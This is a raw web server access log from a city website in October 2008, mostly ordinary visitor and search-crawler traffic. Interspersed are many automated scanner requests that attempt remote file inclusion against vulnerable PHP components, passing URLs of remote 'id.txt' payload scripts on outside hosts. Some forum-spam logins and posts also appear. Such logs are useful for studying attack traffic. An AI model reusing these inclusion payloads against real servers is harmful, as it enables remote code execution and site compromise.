209.160.65.55 - - [30/Oct/2008:05:43:28 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 807 "-" "libwww-perl/5.810" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:43:28 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 813 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:43:30 -0700] "GET /listings/event/detail.php?id=18 HTTP/1.1" 200 16996 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:43:34 -0700] "GET / HTTP/1.1" 200 44270 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
209.160.65.55 - - [30/Oct/2008:05:43:38 -0700] "GET /logs/access_081007.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.0" 404 815 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:43:52 -0700] "GET /listings/event/results.php?letter=h&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:43:57 -0700] "GET /listings/event/results.php?letter=o&category_id=3 HTTP/1.1" 200 18480 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:44:03 -0700] "GET /listings/event/results.php?letter=q&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:44:10 -0700] "GET /frontbanner.swf HTTP/1.1" 200 547694 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:44:10 -0700] "GET /sampo/xml/Dateline.xml HTTP/1.1" 200 73544 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:44:10 -0700] "GET /listings/event/results.php?letter=x&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:44:13 -0700] "GET /sampo/playlist.css HTTP/1.1" 200 559 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:44:14 -0700] "GET /listings/event/results.php?letter=c&category_id=3 HTTP/1.1" 200 19340 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:44:19 -0700] "GET /listings/listing/results.php?category_id=723 HTTP/1.1" 200 24393 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:44:21 -0700] "GET /listings/event/results.php?letter=l&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:44:21 -0700] "GET /listings/listing/results.php?category_id=723 HTTP/1.1" 200 24393 "-" "Mediapartners-Google" "www.sancarloscity.org"
70.85.114.130 - - [30/Oct/2008:05:44:26 -0700] "GET /logs/access_080921.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 777 "-" "libwww-perl/5.805" "www.sancarloscity.org"
70.85.114.130 - - [30/Oct/2008:05:44:26 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 766 "-" "libwww-perl/5.805" "www.sancarloscity.org"
70.85.114.130 - - [30/Oct/2008:05:44:26 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 772 "-" "libwww-perl/5.805" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:44:26 -0700] "GET /listings/event/results.php?letter=i&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:44:41 -0700] "GET /listings/event/results.php?letter=no&category_id=3 HTTP/1.1" 200 17386 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
72.29.68.220 - - [30/Oct/2008:05:44:47 -0700] "GET /logs/access_081004.log/?sIncPath=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.29.68.220 - - [30/Oct/2008:05:44:47 -0700] "GET /?sIncPath=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 200 44270 "-" "libwww-perl/5.810" "www.sancarloscity.org"
72.29.68.220 - - [30/Oct/2008:05:44:48 -0700] "GET /logs/?sIncPath=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 200 71305 "-" "libwww-perl/5.810" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:44:51 -0700] "GET /listings/event/results.php?letter=t&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
121.170.11.100 - - [30/Oct/2008:05:44:52 -0700] "GET /logs/access_081009.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.geocities.com/kucluk_pamungkas/safe.txt??? HTTP/1.1" 404 797 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:44:57 -0700] "GET /listings/event/results.php?letter=u&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:45:03 -0700] "GET /listings/event/results.php?letter=d&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:45:05 -0700] "GET /listings/claim.php?claimlistingid=14883 HTTP/1.1" 200 12780 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:45:09 -0700] "GET /listings/listing/results.php?category_id=735 HTTP/1.1" 200 31133 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:10 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=usercp&CODE=start_subs&method=forum&fid=9 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:45:11 -0700] "GET /listings/event/results.php?letter=n&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:14 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&act=usercp&CODE=start_subs&method=topic&tid=147 HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:45:17 -0700] "GET /listings/event/results.php?letter=w&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:45:17 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 759 "-" "libwww-perl/5.65" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:18 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&automodule=blog HTTP/1.1" 200 7722 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
66.249.73.51 - - [30/Oct/2008:05:45:19 -0700] "GET /listings/listing/results.php?letter=v&category_id=692 HTTP/1.1" 200 25073 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:22 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&showforum=8 HTTP/1.1" 200 7884 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:27 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&showforum=9 HTTP/1.1" 200 7884 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.235.253.1 - - [30/Oct/2008:05:45:28 -0700] "GET /logs/access_080927.log//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/id.txt?? HTTP/1.1" 404 789 "-" "libwww-perl/5.65" "www.sancarloscity.org"
64.235.253.1 - - [30/Oct/2008:05:45:28 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/id.txt?? HTTP/1.1" 404 765 "-" "libwww-perl/5.65" "www.sancarloscity.org"
64.235.253.1 - - [30/Oct/2008:05:45:29 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.msad49.org/Clinton/id.txt?? HTTP/1.1" 404 771 "-" "libwww-perl/5.65" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:32 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&showtopic=147&mode=linear HTTP/1.1" 200 7889 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:45:34 -0700] "GET /listings/event/results.php?letter=i&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:05:45:36 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:05:45:36 -0700] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=a433729f33f928ab4679667b53bf8e16 HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=a433729f33f928ab4679667b53bf8e16" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:37 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&showtopic=147&mode=linearplus HTTP/1.1" 200 7889 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:05:45:38 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=a433729f33f928ab4679667b53bf8e16" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:05:45:38 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=a433729f33f928ab4679667b53bf8e16 HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=a433729f33f928ab4679667b53bf8e16" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:45:40 -0700] "GET /listings/event/results.php?letter=m&category_id=3 HTTP/1.1" 200 17393 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:43 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&showtopic=147&mode=threaded HTTP/1.1" 200 7889 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:05:45:47 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=a433729f33f928ab4679667b53bf8e16" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
84.16.224.100 - - [30/Oct/2008:05:45:48 -0700] "GET /jodera2/viewtopic.php?p=29895#29895 HTTP/1.0" 200 31665 "http://www.sancarloscity.org/viewtopic.php?p=29895#29895" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:45:49 -0700] "GET /listings/listing/results.php?category_id=713 HTTP/1.1" 200 24396 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
207.44.238.63 - - [30/Oct/2008:05:45:50 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 807 "-" "libwww-perl/5.79" "www.sancarloscity.org"
207.44.238.63 - - [30/Oct/2008:05:45:50 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 813 "-" "libwww-perl/5.79" "www.sancarloscity.org"
207.44.238.63 - - [30/Oct/2008:05:45:50 -0700] "GET /logs/access_080928.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.79" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:45:56 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&showtopic=147&view=new HTTP/1.1" 200 7889 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:45:56 -0700] "GET /listings/event/results.php?letter=g&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
207.44.238.63 - - [30/Oct/2008:05:45:59 -0700] "GET /logs/access_080929.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.desividesimasti.net/forums/games/includes/images/id.txt???? HTTP/1.1" 404 831 "-" "libwww-perl/5.79" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:46:01 -0700] "GET /listings/event/results.php?letter=a&category_id=3 HTTP/1.1" 200 18485 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:46:07 -0700] "GET /listings/event/results.php?letter=r&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
208.115.111.242 - - [30/Oct/2008:05:46:08 -0700] "GET /forum2/index.php?s=320fc7207954b248ab5fa0215e8c3c96&showtopic=147&view=old HTTP/1.1" 200 7889 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:46:08 -0700] "GET /listings/listing/results.php?category_id=714 HTTP/1.1" 200 24415 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:46:09 -0700] "GET /logs/access_081002.log//Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 783 "-" "libwww-perl/5.65" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:46:16 -0700] "GET /listings/event/results.php?letter=z&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
217.115.112.62 - - [30/Oct/2008:05:46:17 -0700] "GET /logs/access_081002.log//Neos_Chronos/header.php?base_folder=http://www.shefaa.org/images/id?? HTTP/1.1" 404 783 "-" "libwww-perl/5.65" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:46:22 -0700] "GET /listings/event/results.php?letter=v&category_id=3 HTTP/1.1" 200 18353 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:05:46:22 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61811 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:46:26 -0700] "GET /listings/event/results.php?letter=s&category_id=3 HTTP/1.1" 200 21796 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:05:46:32 -0700] "GET /jodera2/viewforum.php?f=1&sid=4cb898346f998015c7912dcb18933252 HTTP/1.0" 200 84783 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:46:39 -0700] "GET /listings/event/results.php?letter=y&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:05:46:41 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:46:42 -0700] "GET /listings/event/detail.php?id=12 HTTP/1.1" 200 17103 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:05:46:42 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:46:51 -0700] "GET /listings/event/results.php?letter=b&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:05:46:53 -0700] "GET /jodera2/index.php?sid=4cb898346f998015c7912dcb18933252 HTTP/1.0" 200 55147 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
72.29.68.220 - - [30/Oct/2008:05:46:55 -0700] "GET /logs/access_081015.log/?sIncPath=http://djvirgil.nl/modules/id.txt?? HTTP/1.1" 404 759 "-" "libwww-perl/5.810" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:05:46:56 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41368 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
74.6.8.93 - - [30/Oct/2008:05:46:59 -0700] "GET /logs/access_071013.log HTTP/1.0" 200 3691423 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
70.85.114.130 - - [30/Oct/2008:05:47:14 -0700] "GET /logs/access_080913.log///vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 783 "-" "libwww-perl/5.805" "www.sancarloscity.org"
70.85.114.130 - - [30/Oct/2008:05:47:16 -0700] "GET //vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 759 "-" "libwww-perl/5.805" "www.sancarloscity.org"
70.85.114.130 - - [30/Oct/2008:05:47:16 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.irtt.ir/poll/image/id.jpg??? HTTP/1.1" 404 765 "-" "libwww-perl/5.805" "www.sancarloscity.org"
200.63.42.93 - - [30/Oct/2008:05:47:16 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11446 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:47:28 -0700] "GET /listings/event/results.php?letter=j&category_id=3 HTTP/1.1" 200 10524 "http://www.sancarloscity.org/listings/event/results.php?category_id=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
64.41.133.39 - - [30/Oct/2008:05:47:40 -0700] "GET /listings/event/results.php?letter=q&category_id=15 HTTP/1.1" 200 10506 "http://www.sancarloscity.org/listings/event/results.php?category_id=15" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:47:42 -0700] "GET /picgallery/thumbnails.php?album=78 HTTP/1.1" 200 18183 "http://www.sancarloscity.org/frontbanner.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:47:42 -0700] "GET /picgallery/themes/classic/style.css HTTP/1.1" 200 10890 "http://www.sancarloscity.org/frontbanner.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:47:42 -0700] "GET /picgallery/scripts.js HTTP/1.1" 200 2715 "http://www.sancarloscity.org/frontbanner.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:47:44 -0700] "GET /picgallery/albums/userpics/10001/thumb_IMG_6680.jpg HTTP/1.1" 200 2494 "http://www.sancarloscity.org/frontbanner.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "sancarloscity.org"
84.16.230.126 - - [30/Oct/2008:05:47:56 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060319 Firefox/2.0a1" "www.sancarloscity.org"
69.116.50.249 - - [30/Oct/2008:05:47:58 -0700] "GET /picgallery/displayimage.php?album=78&pos=0 HTTP/1.1" 200 10135 "http://www.sancarloscity.org/picgallery/thumbnails.php?album=78" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "www.sancarloscity.org"
